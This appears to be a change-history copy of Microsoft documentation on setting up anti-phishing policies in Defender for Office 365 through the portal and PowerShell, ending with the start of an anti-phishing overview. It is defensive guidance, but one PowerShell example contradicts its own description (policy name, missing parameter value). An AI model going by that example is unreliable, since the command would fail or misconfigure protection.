- - **Enable intelligence for impersonation protection**: This setting is available only if **Enable mailbox intelligence** is selected. This setting allows mailbox intelligence to take action on messages that are identified as impersonation attempts. You specify the action to take for mailbox intelligence detections on the next page.
-
- > [!NOTE]
- > Mailbox intelligence protection doesn't work if the sender and recipient have previously communicated via email. If the sender and recipient have never communicated via email, the message can be identified as an impersonation attempt by mailbox intelligence.
-
- To turn on mailbox intelligence protection, select the check box. You specify the action for mailbox intelligence detections on the next page.
-
- - **Spoof** section: Use the **Enable spoof intelligence** check box to turn spoof intelligence on or off. This setting is selected by default, and we recommend that you leave it selected. You specify the action to take on messages from blocked spoofed senders on the next page.
-
- To turn off spoof intelligence, clear the check box.
-
- > [!NOTE]
- > You don't need to turn off spoof intelligence if your MX record doesn't point to Microsoft 365; you enable Enhanced Filtering for Connectors instead. For instructions, see [Enhanced Filtering for Connectors in Exchange Online](/Exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors).
-
- When you're finished on the **Phishing threshold & protection** page, select **Next**.
-
-6. On the **Actions** page, configure the following settings:
-
- - **Message actions** section: Configure the following actions:
-
- - **If a message is detected as user impersonation**: This setting is available only if you selected **Enable users to protect** on the previous page. Select one of the following actions in the dropdown list:
- - **Don't apply any action** (default)
- - **Redirect the message to other email addresses**
- - **Move the message to the recipients' Junk Email folders**
- - **Quarantine the message**: If you select this action, an **Apply quarantine policy** box appears where you select the quarantine policy that applies to messages that are quarantined by user impersonation protection. Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information about quarantine policies, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
- If you don't select a quarantine policy, the default quarantine policy for user impersonation detections is used (DefaultFullAccessPolicy). When you later view or edit the anti-phishing policy settings, the quarantine policy name is shown.
-
- - **Deliver the message and add other addresses to the Bcc line**
- - **Delete the message before it's delivered**
-
- - **If the message is detected as an impersonated domain**: This setting is available only if you selected **Enable domains to protect** on the previous page. Select one of the following actions in the dropdown list:
- - **Don't apply any action** (default)
- - **Redirect the message to other email addresses**
- - **Move the message to the recipients' Junk Email folders**
- - **Quarantine the message**: If you select this action, an **Apply quarantine policy** box appears where you select the quarantine policy that applies to messages that are quarantined by domain impersonation protection.
-
- If you don't select a quarantine policy, the default quarantine policy for domain impersonation detections is used (DefaultFullAccessPolicy). When you later view or edit the anti-phishing policy settings, the quarantine policy name is shown.
-
- - **Deliver the message and add other addresses to the Bcc line**
- - **Delete the message before it's delivered**
-
- - **If mailbox intelligence detects an impersonated user**: This setting is available only if you selected **Enable intelligence for impersonation protection** on the previous page. Select one of the following actions in the dropdown list:
- - **Don't apply any action** (default)
- - **Redirect the message to other email addresses**
- - **Move the message to the recipients' Junk Email folders**
- - **Quarantine the message**: If you select this action, an **Apply quarantine policy** box appears where you select the quarantine policy that applies to messages that are quarantined by mailbox intelligence protection.
-
- If you don't select a quarantine policy, the default quarantine policy for mailbox intelligence detections is used (DefaultFullAccessPolicy). When you later view or edit the anti-phishing policy settings, the quarantine policy name is shown.
-
- - **Deliver the message and add other addresses to the Bcc line**
- - **Delete the message before it's delivered**
-
- - **Honor DMARC record policy when the message is detected as spoof**: This setting is selected by default, and allows you to control what happens to messages where the sender fails explicit [DMARC](email-authentication-dmarc-configure.md) checks and the DMARC policy is set to `p=quarantine` or `p=reject`:
- - **If the message is detected as spoof and DMARC Policy is set as p=quarantine**: Select one of the following actions:
- - **Quarantine the message**: This is the default value.
- - **Move message to the recipients' Junk Email folders**
-
- - **If the message is detected as spoof and DMARC Policy is set as p=reject**: Select one of the following actions:
- - **Quarantine the message**
- - **Reject the message**: This is the default value.
-
- For more information, see [Spoof protection and sender DMARC policies](anti-phishing-policies-about.md#spoof-protection-and-sender-dmarc-policies).
-
- - **If the message is detected as spoof by spoof intelligence**: This setting is available only if you selected **Enable spoof intelligence** on the previous page. Select one of the following actions in the dropdown list for messages from blocked spoofed senders:
- - **Move the message to the recipients' Junk Email folders** (default)
- - **Quarantine the message**: If you select this action, an **Apply quarantine policy** box appears where you select the quarantine policy that applies to messages that are quarantined by spoof intelligence protection.
-
- If you don't select a quarantine policy, the default quarantine policy for spoof intelligence detections is used (DefaultFullAccessPolicy). When you later view or edit the anti-phishing policy settings, the quarantine policy name is shown.
-
- - **Safety tips & indicators** section: Configure the following settings:
- - **Show first contact safety tip**: For more information, see [First contact safety tip](anti-phishing-policies-about.md#first-contact-safety-tip).
- - **Show user impersonation safety tip**: This setting is available only if you selected **Enable users to protect** on the previous page.
- - **Show domain impersonation safety tip**: This setting is available only if you selected **Enable domains to protect** on the previous page.
- - **Show user impersonation unusual characters safety tip** This setting is available only if you selected **Enable users to protect** or **Enable domains to protect** on the previous page.
- - **Show (?) for unauthenticated senders for spoof**: This setting is available only if you selected **Enable spoof intelligence** on the previous page. Adds a question mark (?) to the sender's photo in the From box in Outlook if the message doesn't pass SPF or DKIM checks **and** the message doesn't pass DMARC or [composite authentication](email-authentication-about.md#composite-authentication). This setting is selected by default.
- - **Show "via" tag**: This setting is available only if you selected **Enable spoof intelligence** on the previous page. Adds tag named via (chris@contoso.com via fabrikam.com) to the From address if it's different from the domain in the DKIM signature or the **MAIL FROM** address. This setting is selected by default.
-
- To turn on a setting, select the check box. To turn it off, clear the check box.
-
- When you're finished on the **Actions** page, select **Next**.
-
-7. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review** page, select **Submit**.
-
-8. On the **New anti-phishing policy created** page, you can select the links to view the policy, view anti-phishing policies, and learn more about anti-phishing policies.
-
- When you're finished on the **New anti-phishing policy created** page, select **Done**.
-
- Back on the **Anti-phishing** page, the new policy is listed.
-
-## Use the Microsoft Defender portal to view anti-phishing policy details
-
-In the Microsoft Defender portal, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. Or, to go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-On the **Anti-phishing** page, the following properties are displayed in the list of anti-phishing policies:
--- **Name**-- **Status**: Values are:
- - **Always on** for the default anti-phishing policy.
- - **On** or **Off** for other anti-spam policies.
-- **Priority**: For more information, see the [Set the priority of custom anti-spam policies](#use-the-microsoft-defender-portal-to-set-the-priority-of-custom-anti-phishing-policies) section.
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the policies by **Time range** (creation date) or **Status**.
-
-Use the :::image type="icon" source="../../media/search-icon.png" border="false"::: **Search** box and a corresponding value to find specific anti-phishing policies.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of policies to a CSV file.
-
-Select a policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-> [!TIP]
-> To see details about other anti-phishing policies without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Use the Microsoft Defender portal to take action on anti-phishing policies
-
-1. In the Microsoft Defender portal, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. Or, to go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-2. On the **Anti-phishing** page, select the anti-phishing policy by using either of the following methods:
-
- - Select the policy from the list by selecting the check box next to the name. The following actions are available in the :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** dropdown list that appears:
- - **Enable selected policies**.
- - **Disable selected policies**.
- - **Delete selected policies**.
-
- :::image type="content" source="../../media/anti-phishing-policies-main-page.png" alt-text="The Anti-phishing page with a policy selected and the More actions control expanded." lightbox="../../media/anti-phishing-policies-main-page.png":::
-
- - Select the policy from the list by clicking anywhere in the row other than the check box next to the name. Some or all following actions are available in the details flyout that opens:
- - Modify policy settings by selecting **Edit** in each section (custom policies or the default policy)
- - :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** or :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** (custom policies only)
-
- :::image type="content" source="../../media/anti-phishing-policies-details-flyout.png" alt-text="The details flyout of a custom anti-phishing policy." lightbox="../../media/anti-phishing-policies-details-flyout.png":::
-
-The actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify anti-phishing policies
-
-After you select the default anti-phishing policy or a custom policy by clicking anywhere in the row other than the check box next to the name, the policy settings are shown in the details flyout that opens. Select **Edit** in each section to modify the settings within the section. For more information about the settings, see the [create anti-phishing policies](#use-the-microsoft-defender-portal-to-create-anti-phishing-policies) section earlier in this article.
-
-For the default policy, you can't modify the name of the policy, and there are no recipient filters to configure (the policy applies to all recipients). But, you can modify all other settings in the policy.
-
-For the anti-phishing policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md), you can't modify the policy settings in the details flyout. Instead, you select :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **View preset security policies** in the details flyout to go to the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies> to modify the preset security policies.
-
-### Use the Microsoft Defender portal to enable or disable custom anti-phishing policies
-
-You can't disable the default anti-phishing policy (it's always enabled).
-
-You can't enable or disable the anti-phishing policies that are associated with Standard and Strict preset security policies. You enable or disable the Standard or Strict preset security policies on the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies>.
-
-After you select an enabled custom anti-phishing policy (the **Status** value is **On**), use either of the following methods to disable it:
--- **On the Anti-phishing page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Disable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** at the top of the flyout.-
-After you select a disabled custom anti-phishing policy (the **Status** value is **Off**), use either of the following methods to enable it:
--- **On the Anti-phishing page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Enable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** at the top of the flyout.-
-On the **Anti-phishing** page, the **Status** value of the policy is now **On** or **Off**.
-
-### Use the Microsoft Defender portal to set the priority of custom anti-phishing policies
-
-Anti-phishing policies are processed in the order that they're displayed on the **Anti-phishing** page:
--- The anti-phishing policy named **Strict Preset Security Policy** that's associated with the Strict preset security policy is always applied first (if the Strict preset security policy is [enabled](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users)).-- The anti-phishing policy named **Standard Preset Security Policy** that's associated with the Standard preset security policy is always applied next (if the Standard preset security policy is enabled).-- Custom anti-phishing policies are applied next in priority order (if they're enabled):
- - A lower priority value indicates a higher priority (0 is the highest).
- - By default, a new policy is created with a priority that's lower than the lowest existing custom policy (the first is 0, the next is 1, etc.).
- - No two policies can have the same priority value.
-- The default anti-phishing policy always has the priority value **Lowest**, and you can't change it.-
-Anti-phishing protection stops for a recipient after the first policy is applied (the highest priority policy for that recipient). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-After you select the custom anti-phishing policy by clicking anywhere in the row other than the check box next to the name, you can increase or decrease the priority of the policy in the details flyout that opens:
--- The custom policy with the **Priority** value **0** on the **Anti-Phishing** page has the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** action at the top of the details flyout.-- The custom policy with the lowest priority (highest **Priority** value; for example, **3**) has the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** action at the top of the details flyout.-- If you have three or more policies, the policies between **Priority** 0 and the lowest priority have both the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** and the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** actions at the top of the details flyout.-
-When you're finished in the policy details flyout, select **Close**.
-
-Back on the **Anti-phishing** page, the order of the policy in the list matches the updated **Priority** value.
-
-### Use the Microsoft Defender portal to remove custom anti-phishing policies
-
-You can't remove the default anti-phishing policy or the anti-phishing policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md).
-
-After you select the custom anti-phishing policy, use either of the following methods to remove it:
--- **On the Anti-phishing page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Delete selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** at the top of the flyout.-
-Select **Yes** in the warning dialog that opens.
-
-On the **Anti-phishing** page, the deleted policy is no longer listed.
-
-## Use Exchange Online PowerShell to configure anti-phishing policies
-
-In PowerShell, the basic elements of an anti-phishing policy are:
--- **The anti-phish policy**: Specifies the phishing protections to enable or disable, the actions to apply for those protections, and other options.-- **The anti-phish rule**: Specifies the priority and recipient filters (who the policy applies to) for the associated anti-phish policy.-
-The difference between these two elements isn't obvious when you manage anti-phishing policies in the Microsoft Defender portal:
--- When you create a policy in the Defender portal, you're actually creating an anti-phish rule and the associated anti-phish policy at the same time using the same name for both.-- When you modify a policy in the Defender portal, settings related to the name, priority, enabled or disabled, and recipient filters modify the anti-phish rule. All other settings modify the associated anti-phish policy.-- When you remove a policy in the Defender portal, the anti-phish rule and the associated anti-phish policy are removed at the same time.-
-In Exchange Online PowerShell, the difference between anti-phish policies and anti-phish rules is apparent. You manage anti-phish policies by using the **\*-AntiPhishPolicy** cmdlets, and you manage anti-phish rules by using the **\*-AntiPhishRule** cmdlets.
--- In PowerShell, you create the anti-phish policy first, then you create the anti-phish rule, which identifies the associated policy that the rule applies to.-- In PowerShell, you modify the settings in the anti-phish policy and the anti-phish rule separately.-- When you remove an anti-phish policy from PowerShell, the corresponding anti-phish rule isn't automatically removed, and vice versa.-
-### Use PowerShell to create anti-phishing policies
-
-Creating an anti-phishing policy in PowerShell is a two-step process:
-
-1. Create the anti-phish policy.
-2. Create the anti-phish rule that specifies the anti-phish policy that the rule applies to.
-
- **Notes**:
--- You can create a new anti-phish rule and assign an existing, unassociated anti-phish policy to it. An anti-phish rule can't be associated with more than one anti-phish policy.-- You can configure the following settings on new anti-phish policies in PowerShell that aren't available in the Microsoft Defender portal until after you create the policy:
- - Create the new policy as disabled (_Enabled_ `$false` on the **New-AntiPhishRule** cmdlet).
- - Set the priority of the policy during creation (_Priority_ _\<Number\>_) on the **New-AntiPhishRule** cmdlet).
-- A new anti-phish policy that you create in PowerShell isn't visible in the Microsoft Defender portal until you assign the policy to an anti-phish rule.-
-#### Step 1: Use PowerShell to create an anti-phish policy
-
-To create an anti-phish policy, use this syntax:
-
-```PowerShell
-New-AntiPhishPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] <Additional Settings>
-```
-
-This example creates an anti-phish policy named Research Quarantine with the following settings:
--- The policy is enabled (we aren't using the _Enabled_ parameter, and the default value is `$true`).-- The description is: Research department policy.-- Enables organization domains protection for all accepted domains, and targeted domains protection for fabrikam.com.-- Specifies Quarantine as the action for domain impersonation detections, and uses the default quarantine policy for the quarantined messages (we aren't using the _TargetedDomainQuarantineTag_ parameter).-- Specifies Mai Fujito (mfujito@fabrikam.com) as the user to protect from impersonation.-- Specifies Quarantine as the action for user impersonation detections, and uses the default quarantine policy for the quarantined messages (we aren't using the _TargetedUserQuarantineTag_ parameter).-- Enables mailbox intelligence (_EnableMailboxIntelligence_), allows mailbox intelligence protection to take action on messages (_EnableMailboxIntelligenceProtection_), specifies Quarantine as the action for detected messages, and uses the default quarantine policy for the quarantined messages (we aren't using the _MailboxIntelligenceQuarantineTag_ parameter).-- Changes the default action for spoofing detections to Quarantine, and uses the default quarantine policy for the quarantined messages (we aren't using the _SpoofQuarantineTag_ parameter).-- Honoring `p=quarantine` and `p=reject` in sender DMARC policies is on by default (we aren't using the _HonorDmarcPolicy_ parameter, and the default value is `$true`).
- - Messages that fail DMARC where the sender's DMARC policy is `p=quarantine` are quarantined (we aren't using the _DmarcQuarantineAction_ parameter, and the default value is Quarantine).
- - Messages that fail DMARC where the sender's DMARC policy is `p=reject` are rejected (we aren't using the _DmarcRejectAction_ parameter, and the default value is Reject).
-- Enables all safety tips.-
-```powershell
-New-AntiPhishPolicy -Name "Monitor Policy" -AdminDisplayName "Research department policy" -EnableOrganizationDomainsProtection $true -EnableTargetedDomainsProtection $true -TargetedDomainsToProtect fabrikam.com -TargetedDomainProtectionAction Quarantine -EnableTargetedUserProtection $true -TargetedUsersToProtect "Mai Fujito;mfujito@fabrikam.com" -TargetedUserProtectionAction Quarantine -EnableMailboxIntelligence $true -EnableMailboxIntelligenceProtection $true -MailboxIntelligenceProtectionAction -AuthenticationFailAction Quarantine -EnableSimilarUsersSafetyTips $true -EnableSimilarDomainsSafetyTips $true -EnableUnusualCharactersSafetyTips $true
-```
-
-For detailed syntax and parameter information, see [New-AntiPhishPolicy](/powershell/module/exchange/New-AntiPhishPolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policies to use in an anti-phish policy, see [Use PowerShell to specify the quarantine policy in anti-phishing policies](quarantine-policies.md#anti-phishing-policies).
-
-#### Step 2: Use PowerShell to create an anti-phish rule
-
-To create an anti-phish rule, use this syntax:
-
-```PowerShell
-New-AntiPhishRule -Name "<RuleName>" -AntiPhishPolicy "<PolicyName>" <Recipient filters> [<Recipient filter exceptions>] [-Comments "<OptionalComments>"]
-```
-
-This example creates an anti-phish rule named Research Department with the following conditions:
--- The rule is associated with the anti-phish policy named Research Quarantine.-- The rule applies to members of the group named Research Department.-- Because we aren't using the _Priority_ parameter, the default priority is used.-
-```powershell
-New-AntiPhishRule -Name "Research Department" -AntiPhishPolicy "Research Quarantine" -SentToMemberOf "Research Department"
-```
-
-For detailed syntax and parameter information, see [New-AntiPhishRule](/powershell/module/exchange/New-AntiPhishRule).
-
-### Use PowerShell to view anti-phish policies
-
-To view existing anti-phish policies, use the following syntax:
-
-```PowerShell
-Get-AntiPhishPolicy [-Identity "<PolicyIdentity>"] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all anti-phish policies along with the specified properties.
-
-```PowerShell
-Get-AntiPhishPolicy | Format-Table Name,IsDefault
-```
-
-This example returns all the property values for the anti-phish policy named Executives.
-
-```PowerShell
-Get-AntiPhishPolicy -Identity "Executives"
-```
-
-For detailed syntax and parameter information, see [Get-AntiPhishPolicy](/powershell/module/exchange/Get-AntiPhishPolicy).
-
-### Use PowerShell to view anti-phish rules
-
-To view existing anti-phish rules, use the following syntax:
-
-```PowerShell
-Get-AntiPhishRule [-Identity "<RuleIdentity>"] [-State <Enabled | Disabled] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all anti-phish rules along with the specified properties.
-
-```PowerShell
-Get-AntiPhishRule | Format-Table Name,Priority,State
-```
-
-To filter the list by enabled or disabled rules, run the following commands:
-
-```PowerShell
-Get-AntiPhishRule -State Disabled | Format-Table Name,Priority
-```
-
-```PowerShell
-Get-AntiPhishRule -State Enabled | Format-Table Name,Priority
-```
-
-This example returns all the property values for the anti-phish rule named Contoso Executives.
-
-```PowerShell
-Get-AntiPhishRule -Identity "Contoso Executives"
-```
-
-For detailed syntax and parameter information, see [Get-AntiPhishRule](/powershell/module/exchange/Get-AntiPhishrule).
-
-### Use PowerShell to modify anti-phish policies
-
-Other than the following items, the same settings are available when you modify an anti-phish policy in PowerShell as when you create the policy as described in the [Step 1: Use PowerShell to create an anti-phish policy](#step-1-use-powershell-to-create-an-anti-phish-policy) section earlier in this article.
--- The _MakeDefault_ switch that turns the specified policy into the default policy (applied to everyone, always **Lowest** priority, and you can't delete it) is only available when you modify an anti-phish policy in PowerShell.--- You can't rename an anti-phish policy (the **Set-AntiPhishPolicy** cmdlet has no _Name_ parameter). When you rename an anti-phishing policy in the Microsoft Defender portal, you're only renaming the anti-phish _rule_.-
-To modify an anti-phish policy, use this syntax:
-
-```PowerShell
-Set-AntiPhishPolicy -Identity "<PolicyName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-AntiPhishPolicy](/powershell/module/exchange/Set-AntiPhishPolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policies to use in an anti-phish policy, see [Use PowerShell to specify the quarantine policy in anti-phishing policies](quarantine-policies.md#anti-phishing-policies).
-
-### Use PowerShell to modify anti-phish rules
-
-The only setting that isn't available when you modify an anti-phish rule in PowerShell is the _Enabled_ parameter that allows you to create a disabled rule. To enable or disable existing anti-phish rules, see the next section.
-
-Otherwise, no additional settings are available when you modify an anti-phish rule in PowerShell. The same settings are available when you create a rule as described in the [Step 2: Use PowerShell to create an anti-phish rule](#step-2-use-powershell-to-create-an-anti-phish-rule) section earlier in this article.
-
-To modify an anti-phish rule, use this syntax:
-
-```PowerShell
-Set-AntiPhishRule -Identity "<RuleName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-AntiPhishRule](/powershell/module/exchange/set-antiphishrule).
-
-### Use PowerShell to enable or disable anti-phish rules
-
-Enabling or disabling an anti-phish rule in PowerShell enables or disables the whole anti-phishing policy (the anti-phish rule and the assigned anti-phish policy). You can't enable or disable the default anti-phishing policy (it's always applied to all recipients).
-
-To enable or disable an anti-phish rule in PowerShell, use this syntax:
-
-```PowerShell
-<Enable-AntiPhishRule | Disable-AntiPhishRule> -Identity "<RuleName>"
-```
-
-This example disables the anti-phish rule named Marketing Department.
-
-```PowerShell
-Disable-AntiPhishRule -Identity "Marketing Department"
-```
-
-This example enables same rule.
-
-```PowerShell
-Enable-AntiPhishRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Enable-AntiPhishRule](/powershell/module/exchange/enable-antiphishrule) and [Disable-AntiPhishRule](/powershell/module/exchange/disable-antiphishrule).
-
-### Use PowerShell to set the priority of anti-phish rules
-
-The highest priority value you can set on a rule is 0. The lowest value you can set depends on the number of rules. For example, if you have five rules, you can use the priority values 0 through 4. Changing the priority of an existing rule can have a cascading effect on other rules. For example, if you have five custom rules (priorities 0 through 4), and you change the priority of a rule to 2, the existing rule with priority 2 is changed to priority 3, and the rule with priority 3 is changed to priority 4.
-
-To set the priority of an anti-phish rule in PowerShell, use the following syntax:
-
-```PowerShell
-Set-AntiPhishRule -Identity "<RuleName>" -Priority <Number>
-```
-
-This example sets the priority of the rule named Marketing Department to 2. All existing rules that have a priority less than or equal to 2 are decreased by 1 (their priority numbers are increased by 1).
-
-```PowerShell
-Set-AntiPhishRule -Identity "Marketing Department" -Priority 2
-```
-
-**Notes**:
--- To set the priority of a new rule when you create it, use the _Priority_ parameter on the **New-AntiPhishRule** cmdlet instead.-- The default anti-phish policy doesn't have a corresponding anti-phish rule, and it always has the unmodifiable priority value **Lowest**.-
-### Use PowerShell to remove anti-phish policies
-
-When you use PowerShell to remove an anti-phish policy, the corresponding anti-phish rule isn't removed.
-
-To remove an anti-phish policy in PowerShell, use this syntax:
-
-```PowerShell
-Remove-AntiPhishPolicy -Identity "<PolicyName>"
-```
-
-This example removes the anti-phish policy named Marketing Department.
-
-```PowerShell
-Remove-AntiPhishPolicy -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-AntiPhishPolicy](/powershell/module/exchange/Remove-AntiPhishPolicy).
-
-### Use PowerShell to remove anti-phish rules
-
-When you use PowerShell to remove an anti-phish rule, the corresponding anti-phish policy isn't removed.
-
-To remove an anti-phish rule in PowerShell, use this syntax:
-
-```PowerShell
-Remove-AntiPhishRule -Identity "<PolicyName>"
-```
-
-This example removes the anti-phish rule named Marketing Department.
-
-```PowerShell
-Remove-AntiPhishRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-AntiPhishRule](/powershell/module/exchange/Remove-AntiPhishRule).
-
-## How do you know these procedures worked?
-
-To verify that you've successfully configured anti-phishing policies in Defender for Office 365, do any of the following steps:
--- On the **Anti-phishing** page in the Microsoft Defender portal at <https://security.microsoft.com/antiphishing>, verify the list of policies, their **Status** values, and their **Priority** values. To view more details, select the policy from the list by clicking anywhere in the row other than the check box next to the name and viewing the details in the flyout that appears.--- In Exchange Online PowerShell, replace \<Name\> with the name of the policy or rule, and run the following command and verify the settings:-
- ```PowerShell
- Get-AntiPhishPolicy -Identity "<Name>"
- ```
-
- ```PowerShell
- Get-AntiPhishRule -Identity "<Name>"
- ```
security Anti Phishing Protection About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-protection-about.md
- Title: Anti-phishing protection
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - TopSMBIssues
-description: Admins can learn about the anti-phishing protection features in Exchange Online Protection (EOP) and Microsoft Defender for Office 365.
- Previously updated : 7/5/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Anti-phishing protection in Microsoft 365
--
-*Phishing* is an email attack that tries to steal sensitive information in messages that appear to be from legitimate or trusted senders. There are specific categories of phishing. For example:
--- **Spear phishing** uses focused, customized content that's specifically tailored to the targeted recipients (typically, after reconnaissance on the recipients by the attacker).--- **Whaling** is directed at executives or other high value targets within an organization for maximum effect.--- **Business email compromise (BEC)** uses forged trusted senders (financial officers, customers, trusted partners, etc.) to trick recipients into approving payments, transferring funds, or revealing customer data. Learn more by watching [this video](https://www.youtube.com/watch?v=8Kn31h9HwIQ&list=PL3ZTgFEc7LystRja2GnDeUFqk44k7-KXf&index=2).--- **Ransomware** that encrypts your data and demands payment to decrypt it almost always starts in phishing messages. Anti-phishing protection can't help you decrypt encrypted files, but it can help detect the initial phishing messages that are associated with the ransomware campaign. For more information about recovering from a ransomware attack, see [Ransomware incident response playbooks](/security/ransomware/).-
-With the growing complexity of attacks, it's even difficult for trained users to identify sophisticated phishing messages. Fortunately, Exchange Online Protection (EOP) and the additional features in Microsoft Defender for Office 365 can help.
-
-## Anti-phishing protection in EOP
-
-Microsoft 365 organizations with mailboxes in Exchange Online or standalone EOP organizations without Exchange Online mailboxes contain the following features that help protect your organization from phishing threats:
--- **Spoof intelligence**: Use the spoof intelligence insight to review detected spoofed senders in messages from external and internal domains, and manually allow or block those detected senders. For more information, see [Spoof intelligence insight in EOP](anti-spoofing-spoof-intelligence.md).--- **Anti-phishing policies in EOP**: Turn spoof intelligence on or off, turn unauthenticated sender indicators in Outlook on or off, and specify the action for blocked spoofed senders. For more information, see [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md).-
- **Honor the sender's DMARC policy when the message is detected as spoof**: Control what happens to messages where the sender fails explicit [DMARC](email-authentication-dmarc-configure.md) checks and the DMARC policy is set to `p=quarantine` or `p=reject`. For more information, see [Spoof protection and sender DMARC policies](anti-phishing-policies-about.md#spoof-protection-and-sender-dmarc-policies).
--- **Allow or block spoofed senders in the Tenant Allow/Block List**: When you override the verdict in the spoof intelligence insight, the spoofed sender becomes a manual allow or block entry that only appears on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=SpoofItem>. You can also manually create allow or block entries for spoofed senders before they're detected by spoof intelligence. For more information, see [Spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#spoofed-senders-in-the-tenant-allowblock-list).--- **Implicit email authentication**: EOP enhances standard email authentication checks for inbound email ([SPF](email-authentication-spf-configure.md), [DKIM](email-authentication-dkim-configure.md), and [DMARC](email-authentication-dmarc-configure.md) with sender reputation, sender history, recipient history, behavioral analysis, and other advanced techniques to help identify forged senders. For more information, see [Email authentication in Microsoft 365](email-authentication-about.md).-
-## Additional anti-phishing protection in Microsoft Defender for Office 365
-
-Microsoft Defender for Office 365 contains additional and more advanced anti-phishing features:
--- **Anti-phishing policies in Microsoft Defender for Office 365**: Configure impersonation protection settings for specific message senders and sender domains, mailbox intelligence settings, and adjustable advanced phishing thresholds. For more information, see [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md). For more information about the differences between anti-phishing policies in EOP and anti-phishing policies in Defender for Office 365, see [Anti-phishing policies in Microsoft 365](anti-phishing-policies-about.md).-- **Campaign Views**: Machine learning and other heuristics identify and analyze messages that are involved in coordinated phishing attacks against the entire service and your organization. For more information, see [Campaign Views in Microsoft Defender for Office 365](campaigns.md).-- **Attack simulation training**: Admins can create fake phishing messages and send them to internal users as an education tool. For more information, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).-
-## Other anti-phishing resources
